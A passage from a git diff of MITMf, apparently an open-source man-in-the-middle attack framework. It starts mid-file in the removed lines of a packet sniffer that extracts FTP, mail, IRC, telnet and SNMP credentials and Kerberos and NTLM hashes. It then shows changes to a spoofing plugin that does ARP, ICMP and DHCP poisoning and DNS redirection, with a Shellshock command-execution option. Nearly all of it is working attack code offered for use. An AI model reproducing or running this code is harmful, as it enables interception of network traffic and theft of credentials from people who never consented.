- - # UDP - if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw): - - src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport) - dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport) - - # SNMP community strings - if pkt.haslayer(SNMP): - self.parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP]) - return - - # Kerberos over UDP - decoded = self.Decode_Ip_Packet(str(pkt)[14:]) - kerb_hash = self.ParseMSKerbv5UDP(decoded['data'][8:]) - if kerb_hash: - self.printer(src_ip_port, dst_ip_port, kerb_hash) - - # TCP - elif pkt.haslayer(TCP) and pkt.haslayer(Raw): - - ack = str(pkt[TCP].ack) - seq = str(pkt[TCP].seq) - src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport) - dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport) - self.frag_remover(ack, load) - self.pkt_frag_loads[src_ip_port] = self.frag_joiner(ack, src_ip_port, load) - full_load = self.pkt_frag_loads[src_ip_port][ack] - - # Limit the packets we regex to increase efficiency - # 750 is a bit arbitrary but some SMTP auth success pkts - # are 500+ characters - if 0 < len(full_load) < 750: - - # FTP - ftp_creds = self.parse_ftp(full_load, dst_ip_port) - if len(ftp_creds) > 0: - for msg in ftp_creds: - self.printer(src_ip_port, dst_ip_port, msg) - return - - # Mail - mail_creds_found = self.mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq) - - # IRC - irc_creds = self.irc_logins(full_load) - if irc_creds != None: - self.printer(src_ip_port, dst_ip_port, irc_creds) - return - - # Telnet - self.telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) - #if telnet_creds != None: - # printer(src_ip_port, dst_ip_port, telnet_creds) - # return - - # HTTP and other protocols that run on TCP + a raw load - self.other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) - - def telnet_logins(self, src_ip_port, dst_ip_port, load, ack, seq): - ''' - Catch telnet logins and passwords - ''' - - msg = None - - if src_ip_port in self.telnet_stream: - # Do a utf decode in case the client sends telnet options before their username - # No one would care to see that - try: - self.telnet_stream[src_ip_port] += load.decode('utf8') - except UnicodeDecodeError: - pass - - # \r or \r\n terminate commands in telnet if my pcaps are to be believed - if '\r' in self.telnet_stream[src_ip_port] or '\r\n' in self.telnet_stream[src_ip_port]: - telnet_split = self.telnet_stream[src_ip_port].split(' ', 1) - cred_type = telnet_split[0] - value = telnet_split[1].replace('\r\n', '').replace('\r', '') - # Create msg, the return variable - msg = 'Telnet %s: %s' % (cred_type, value) - del self.telnet_stream[src_ip_port] - self.printer(src_ip_port, dst_ip_port, msg) - - # This part relies on the telnet packet ending in - # "login:", "password:", or "username:" and being <750 chars - # Haven't seen any false+ but this is pretty general - # might catch some eventually - # maybe use dissector.py telnet lib? - if len(self.telnet_stream) > 100: - self.telnet_stream.popitem(last=False) - mod_load = load.lower().strip() - if mod_load.endswith('username:') or mod_load.endswith('login:'): - self.telnet_stream[dst_ip_port] = 'username ' - elif mod_load.endswith('password:'): - self.telnet_stream[dst_ip_port] = 'password ' - - def ParseMSKerbv5TCP(self, Data): - ''' - Taken from Pcredz because I didn't want to spend the time doing this myself - I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel? - Maybe replace this eventually with the kerberos python lib - Parses Kerberosv5 hashes from packets - ''' - try: - MsgType = Data[21:22] - EncType = Data[43:44] - MessageType = Data[32:33] - except IndexError: - return - - if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02": - if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33": - HashLen = struct.unpack(' 1: - lines = full_load.count('\r\n') - if lines > 1: - full_load = full_load.split('\r\n')[-2] # -1 is '' - return full_load - - def parse_ftp(self, full_load, dst_ip_port): - ''' - Parse out FTP creds - ''' - print_strs = [] - - # Sometimes FTP packets double up on the authentication lines - # We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n" - full_load = self.double_line_checker(full_load, 'USER') - - # FTP and POP potentially use idential client > server auth pkts - ftp_user = re.match(self.ftp_user_re, full_load) - ftp_pass = re.match(self.ftp_pw_re, full_load) - - if ftp_user: - msg1 = 'FTP User: %s' % ftp_user.group(1).strip() - print_strs.append(msg1) - if dst_ip_port[-3:] != ':21': - msg2 = 'Nonstandard FTP port, confirm the service that is running on it' - print_strs.append(msg2) - - elif ftp_pass: - msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip() - print_strs.append(msg1) - if dst_ip_port[-3:] != ':21': - msg2 = 'Nonstandard FTP port, confirm the service that is running on it' - print_strs.append(msg2) - - return print_strs - - def mail_decode(self, src_ip_port, dst_ip_port, mail_creds): - ''' - Decode base64 mail creds - ''' - try: - decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8') - decoded = decoded.replace('\x00', ' ') - except TypeError: - decoded = None - except UnicodeDecodeError as e: - decoded = None - - if decoded != None: - msg = 'Decoded: %s' % decoded - self.printer(src_ip_port, dst_ip_port, msg) - - def mail_logins(self, full_load, src_ip_port, dst_ip_port, ack, seq): - ''' - Catch IMAP, POP, and SMTP logins - ''' - # Handle the first packet of mail authentication - # if the creds aren't in the first packet, save it in mail_auths - - # mail_auths = 192.168.0.2 : [1st ack, 2nd ack...] - - found = False - - # Sometimes mail packets double up on the authentication lines - # We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n" - full_load = self.double_line_checker(full_load, 'auth') - - # Client to server 2nd+ pkt - if src_ip_port in self.mail_auths: - if seq in self.mail_auths[src_ip_port][-1]: - stripped = full_load.strip('\r\n') - try: - decoded = base64.b64decode(stripped) - msg = 'Mail authentication: %s' % decoded - self.printer(src_ip_port, dst_ip_port, msg) - except TypeError: - pass - self.mail_auths[src_ip_port].append(ack) - - # Server responses to client - # seq always = last ack of tcp stream - elif dst_ip_port in self.mail_auths: - if seq in self.mail_auths[dst_ip_port][-1]: - # Look for any kind of auth failure or success - a_s = 'Authentication successful' - a_f = 'Authentication failed' - # SMTP auth was successful - if full_load.startswith('235') and 'auth' in full_load.lower(): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_s) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # SMTP failed - elif full_load.startswith('535 '): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_f) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # IMAP/POP/SMTP failed - elif ' fail' in full_load.lower(): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_f) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # IMAP auth success - elif ' OK [' in full_load: - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_s) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - - # Pkt was not an auth pass/fail so its just a normal server ack - # that it got the client's first auth pkt - else: - if len(self.mail_auths) > 100: - self.mail_auths.popitem(last=False) - self.mail_auths[dst_ip_port].append(ack) - - # Client to server but it's a new TCP seq - # This handles most POP/IMAP/SMTP logins but there's at least one edge case - else: - mail_auth_search = re.match(self.mail_auth_re, full_load, re.IGNORECASE) - if mail_auth_search != None: - auth_msg = full_load - # IMAP uses the number at the beginning - if mail_auth_search.group(1) != None: - auth_msg = auth_msg.split()[1:] - else: - auth_msg = auth_msg.split() - # Check if its a pkt like AUTH PLAIN dvcmQxIQ== - # rather than just an AUTH PLAIN - if len(auth_msg) > 2: - mail_creds = ' '.join(auth_msg[2:]) - msg = 'Mail authentication: %s' % mail_creds - self.printer(src_ip_port, dst_ip_port, msg) - - self.mail_decode(src_ip_port, dst_ip_port, mail_creds) - try: - del self.mail_auths[src_ip_port] - except KeyError: - pass - found = True - - # Mail auth regex was found and src_ip_port is not in mail_auths - # Pkt was just the initial auth cmd, next pkt from client will hold creds - if len(self.mail_auths) > 100: - self.mail_auths.popitem(last=False) - self.mail_auths[src_ip_port] = [ack] - - # At least 1 mail login style doesn't fit in the original regex: - # 1 login "username" "password" - # This also catches FTP authentication! - # 230 Login successful. - elif re.match(self.mail_auth_re1, full_load, re.IGNORECASE) != None: - - # FTP authentication failures trigger this - #if full_load.lower().startswith('530 login'): - # return - - auth_msg = full_load - auth_msg = auth_msg.split() - if 2 < len(auth_msg) < 5: - mail_creds = ' '.join(auth_msg[2:]) - msg = 'Authentication: %s' % mail_creds - self.printer(src_ip_port, dst_ip_port, msg) - self.mail_decode(src_ip_port, dst_ip_port, mail_creds) - found = True - - if found == True: - return True - - def irc_logins(self, full_load): - ''' - Find IRC logins - ''' - user_search = re.match(self.irc_user_re, full_load) - pass_search = re.match(self.irc_pw_re, full_load) - if user_search: - msg = 'IRC nick: %s' % user_search.group(1) - return msg - if pass_search: - msg = 'IRC pass: %s' % pass_search.group(1) - self.printer(src_ip_port, dst_ip_port, msg) - return pass_search - - def headers_to_dict(self, header_lines): - ''' - Convert the list of header lines into a dictionary - ''' - headers = {} - # Incomprehensible list comprehension flattens list of headers - # that are each split at ': ' - # http://stackoverflow.com/a/406296 - headers_list = [x for line in header_lines for x in line.split(': ', 1)] - headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) - # Make the header key (like "Content-Length") lowercase - for header in headers_dict: - headers[header.lower()] = headers_dict[header] - - return headers - - def parse_http_load(self, full_load, http_methods): - ''' - Split the raw load into list of headers and body string - ''' - try: - headers, body = full_load.split("\r\n\r\n", 1) - except ValueError: - headers = full_load - body = '' - header_lines = headers.split("\r\n") - - # Pkts may just contain hex data and no headers in which case we'll - # still want to parse them for usernames and password - http_line = self.get_http_line(header_lines, http_methods) - if not http_line: - headers = '' - body = full_load - - header_lines = [line for line in header_lines if line != http_line] - - return http_line, header_lines, body - - def get_http_line(self, header_lines, http_methods): - ''' - Get the header with the http command - ''' - for header in header_lines: - for method in http_methods: - # / is the only char I can think of that's in every http_line - # Shortest valid: "GET /", add check for "/"? - if header.startswith(method): - http_line = header - return http_line - - - def other_parser(self, src_ip_port, dst_ip_port, full_load, ack, seq, pkt): - - #For now we will parse the HTTP headers through scapy and not through Twisted - #This will have to get changed in the future, seems a bit redundent - http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] - http_line, header_lines, body = self.parse_http_load(full_load, http_methods) - headers = self.headers_to_dict(header_lines) - - # Kerberos over TCP - decoded = self.Decode_Ip_Packet(str(pkt)[14:]) - kerb_hash = self.ParseMSKerbv5TCP(decoded['data'][20:]) - if kerb_hash: - self.printer(src_ip_port, dst_ip_port, kerb_hash) - - # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL) - NTLMSSP2 = re.search(self.NTLMSSP2_re, full_load, re.DOTALL) - NTLMSSP3 = re.search(self.NTLMSSP3_re, full_load, re.DOTALL) - if NTLMSSP2: - self.parse_ntlm_chal(NTLMSSP2.group(), ack) - if NTLMSSP3: - ntlm_resp_found = self.parse_ntlm_resp(NTLMSSP3.group(), seq) - if ntlm_resp_found != None: - self.printer(src_ip_port, dst_ip_port, ntlm_resp_found) - - # Look for authentication headers - if len(headers) == 0: - authenticate_header = None - authorization_header = None - for header in headers: - authenticate_header = re.match(self.authenticate_re, header) - authorization_header = re.match(self.authorization_re, header) - if authenticate_header or authorization_header: - break - - if authorization_header or authenticate_header: - # NETNTLM - netntlm_found = self.parse_netntlm(authenticate_header, authorization_header, headers, ack, seq) - if netntlm_found != None: - self.printer(src_ip_port, dst_ip_port, netntlm_found) - - def parse_netntlm(self, authenticate_header, authorization_header, headers, ack, seq): - ''' - Parse NTLM hashes out - ''' - # Type 2 challenge from server - if authenticate_header != None: - chal_header = authenticate_header.group() - self.parse_netntlm_chal(headers, chal_header, ack) - - # Type 3 response from client - elif authorization_header != None: - resp_header = authorization_header.group() - msg = self.parse_netntlm_resp_msg(headers, resp_header, seq) - if msg != None: - return msg - - def parse_snmp(self, src_ip_port, dst_ip_port, snmp_layer): - ''' - Parse out the SNMP version and community string - ''' - if type(snmp_layer.community.val) == str: - ver = snmp_layer.version.val - msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val) - self.printer(src_ip_port, dst_ip_port, msg) - return True - - def parse_netntlm_chal(self, headers, chal_header, ack): - ''' - Parse the netntlm server challenge - https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py - ''' - header_val2 = headers[chal_header] - header_val2 = header_val2.split(' ', 1) - # The header value can either start with NTLM or Negotiate - if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': - msg2 = header_val2[1] - msg2 = base64.decodestring(msg2) - self.parse_ntlm_chal(ack, msg2) - - def parse_ntlm_chal(self, msg2, ack): - ''' - Parse server challenge - ''' - - Signature = msg2[0:8] - msg_type = struct.unpack(" 50: - self.challenge_acks.popitem(last=False) - self.challenge_acks[ack] = ServerChallenge - - def parse_netntlm_resp_msg(self, headers, resp_header, seq): - ''' - Parse the client response to the challenge - ''' - header_val3 = headers[resp_header] - header_val3 = header_val3.split(' ', 1) - - # The header value can either start with NTLM or Negotiate - if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate': - msg3 = base64.decodestring(header_val3[1]) - return self.parse_ntlm_resp(msg3, seq) - - def parse_ntlm_resp(self, msg3, seq): - ''' - Parse the 3rd msg in NTLM handshake - Thanks to psychomario - ''' - - if seq in self.challenge_acks: - challenge = self.challenge_acks[seq] - else: - challenge = 'CHALLENGE NOT FOUND' - - if len(msg3) > 43: - # Thx to psychomario for below - lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44]) - lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen]) - nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen]) - domain = msg3[domoff:domoff+domlen].replace("\0", "") - user = msg3[useroff:useroff+userlen].replace("\0", "") - # Original check by psychomario, might be incorrect? - #if lmhash != "0"*48: #NTLMv1 - if ntlen == 24: #NTLMv1 - msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge) - return msg - elif ntlen > 60: #NTLMv2 - msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:]) - return msg - - def printer(self, src_ip_port, dst_ip_port, msg): - if dst_ip_port != None: - print_str = '%s --> %s %s' % (src_ip_port, dst_ip_port,msg) - # All credentials will have dst_ip_port, URLs will not - mitmf_logger.info(print_str) - else: - print_str = '%s %s' % (src_ip_port.split(':')[0], msg) - mitmf_logger.info(print_str) diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 0712dc7..148e84c 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -19,111 +19,122 @@ # import logging -import sys +from sys import exit from core.utils import SystemConfig, IpTables -from core.sslstrip.DnsCache import DnsCache -from core.wrappers.protocols import _ARP, _DHCP, _ICMP +from core.protocols.arp.ARPpoisoner import ARPpoisoner +from core.protocols.arp.ARPWatch import ARPWatch +from core.dnschef.DNSchef import DNSChef +from core.protocols.dhcp.DHCPServer import DHCPServer +from core.protocols.icmp.ICMPpoisoner import ICMPpoisoner from plugins.plugin import Plugin -from core.dnschef.dnschef import DNSChef - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import * class Spoof(Plugin): - name = "Spoof" - optname = "spoof" - desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" - version = "0.6" - has_opts = True + name = "Spoof" + optname = "spoof" + desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" + tree_output = list() + version = "0.6" + has_opts = True - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.dnscfg = options.configfile['MITMf']['DNS'] - self.dhcpcfg = options.configfile['Spoof']['DHCP'] - self.target = options.target - self.manualiptables = options.manualiptables - self.protocolInstances = [] + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.dnscfg = self.config['MITMf']['DNS'] + self.dhcpcfg = self.config['Spoof']['DHCP'] + self.targets = options.targets + self.manualiptables = options.manualiptables + self.mymac = SystemConfig.getMAC(options.interface) + self.myip = SystemConfig.getIP(options.interface) + self.protocolInstances = [] - #Makes scapy more verbose - debug = False - if options.log_level is 'debug': - debug = True + #Makes scapy more verbose + debug = False + if options.log_level == 'debug': + debug = True - if options.arp: + if options.arp: - if not options.gateway: - sys.exit("[-] --arp argument requires --gateway") + if not options.gateway: + exit("[-] --arp argument requires --gateway") - arp = _ARP(options.gateway, options.interface, options.mac_address) - arp.target = options.target - arp.arpmode = options.arpmode - arp.debug = debug + if options.targets is None: + #if were poisoning whole subnet, start ARP-Watch + arpwatch = ARPWatch(options.gateway, self.myip, options.interface) + arpwatch.debug = debug - self.protocolInstances.append(arp) + self.tree_output.append("ARPWatch online") + self.protocolInstances.append(arpwatch) - elif options.icmp: + arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets) + arp.arpmode = options.arpmode + arp.debug = debug - if not options.gateway: - sys.exit("[-] --icmp argument requires --gateway") + self.protocolInstances.append(arp) - if not options.target: - sys.exit("[-] --icmp argument requires --target") - icmp = _ICMP(options.interface, options.target, options.gateway, options.ip_address) - icmp.debug = debug + elif options.icmp: - self.protocolInstances.append(icmp) + if not options.gateway: + exit("[-] --icmp argument requires --gateway") - elif options.dhcp: + if not options.targets: + exit("[-] --icmp argument requires --targets") - if options.target: - sys.exit("[-] --target argument invalid when DCHP spoofing") + icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, options.ip_address) + icmp.debug = debug - dhcp = _DHCP(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) - dhcp.shellshock = options.shellshock - dhcp.debug = debug - self.protocolInstances.append(dhcp) + self.protocolInstances.append(icmp) - if options.dns: + elif options.dhcp: - if not options.manualiptables: - if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, self.dnscfg['port']) + if options.targets: + exit("[-] --targets argument invalid when DCHP spoofing") - DNSChef.getInstance().loadRecords(self.dnscfg) + dhcp = DHCPServer(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) + dhcp.shellshock = options.shellshock + dhcp.debug = debug + self.protocolInstances.append(dhcp) - if not options.arp and not options.icmp and not options.dhcp and not options.dns: - sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") + if options.dns: - SystemConfig.setIpForwarding(1) + if not options.manualiptables: + if IpTables.getInstance().dns is False: + IpTables.getInstance().DNS(self.myip, self.dnscfg['port']) - if not options.manualiptables: - if IpTables.getInstance().http is False: - IpTables.getInstance().HTTP(options.listen) + DNSChef.getInstance().loadRecords(self.dnscfg) - for protocol in self.protocolInstances: - protocol.start() + if not options.arp and not options.icmp and not options.dhcp and not options.dns: + exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") - def add_options(self, options): - group = options.add_mutually_exclusive_group(required=False) - group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing') - group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') - group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') - options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries') - options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') - options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') - options.add_argument('--target', dest='target', default=None, help='Specify a host to poison [default: subnet]') - options.add_argument('--arpmode',type=str, dest='arpmode', default='req', choices=["req", "rep"], help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]') - #options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') + SystemConfig.setIpForwarding(1) - def finish(self): - for protocol in self.protocolInstances: - if hasattr(protocol, 'stop'): - protocol.stop() + if not options.manualiptables: + IpTables.getInstance().Flush() + if IpTables.getInstance().http is False: + IpTables.getInstance().HTTP(options.listen) - if not self.manualiptables: - IpTables.getInstance().Flush() + for protocol in self.protocolInstances: + protocol.start() - SystemConfig.setIpForwarding(0) + def add_options(self, options): + group = options.add_mutually_exclusive_group(required=False) + group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing') + group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') + group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') + options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries') + options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') + options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') + options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]') + options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') + + def finish(self): + for protocol in self.protocolInstances: + if hasattr(protocol, 'stop'): + protocol.stop() + + if not self.manualiptables: + IpTables.getInstance().Flush() + + SystemConfig.setIpForwarding(0) diff --git a/plugins/Upsidedownternet.py b/plugins/Upsidedownternet.py index 959f96c..402c9e5 100644 --- a/plugins/Upsidedownternet.py +++ b/plugins/Upsidedownternet.py @@ -23,8 +23,6 @@ from cStringIO import StringIO from plugins.plugin import Plugin from PIL import Image -mitmf_logger = logging.getLogger('mitmf') - class Upsidedownternet(Plugin): name = "Upsidedownternet" optname = "upsidedownternet" @@ -65,7 +63,7 @@ class Upsidedownternet(Plugin): im.save(output, format=image_type) data = output.getvalue() output.close() - mitmf_logger.info("%s Flipped image" % request.client.getClientIP()) + mitmf_logger.info("{} Flipped image".format(request.client.getClientIP())) except Exception as e: - mitmf_logger.info("%s Error: %s" % (request.client.getClientIP(), e)) + mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e)) return {'request': request, 'data': data} diff --git a/plugins/__init__.py b/plugins/__init__.py index 5026fd4..155e900 100644 --- a/plugins/__init__.py +++ b/plugins/__init__.py @@ -3,4 +3,3 @@ import os import glob __all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")] - diff --git a/plugins/plugin.py b/plugins/plugin.py index b73486d..9befa33 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -2,9 +2,12 @@ The base plugin class. This shows the various methods that can get called during the MITM attack. ''' +from core.configwatcher import ConfigWatcher +import logging +mitmf_logger = logging.getLogger('mitmf') -class Plugin(object): +class Plugin(ConfigWatcher, object): name = "Generic plugin" optname = "generic" desc = "" @@ -15,6 +18,10 @@ class Plugin(object): '''Called if plugin is enabled, passed the options namespace''' self.options = options + def startThread(self, options): + '''Anything that will subclass this function will be a thread''' + return + def add_options(options): '''Add your options to the options parser''' raise NotImplementedError @@ -27,6 +34,10 @@ class Plugin(object): '''Handles outgoing request''' raise NotImplementedError + def pluginReactor(self, strippingFactory): + '''This sets up another instance of the reactor on a diffrent port''' + pass + def handleResponse(self, request, data): ''' Handles all non-image responses by default. See Upsidedownternet diff --git a/requirements.txt b/requirements.txt index aa31339..75fc1ad 100644 --- a/requirements.txt +++ b/requirements.txt @@ -14,5 +14,6 @@ ipy pyopenssl service_identity watchdog +impacket capstone pypcap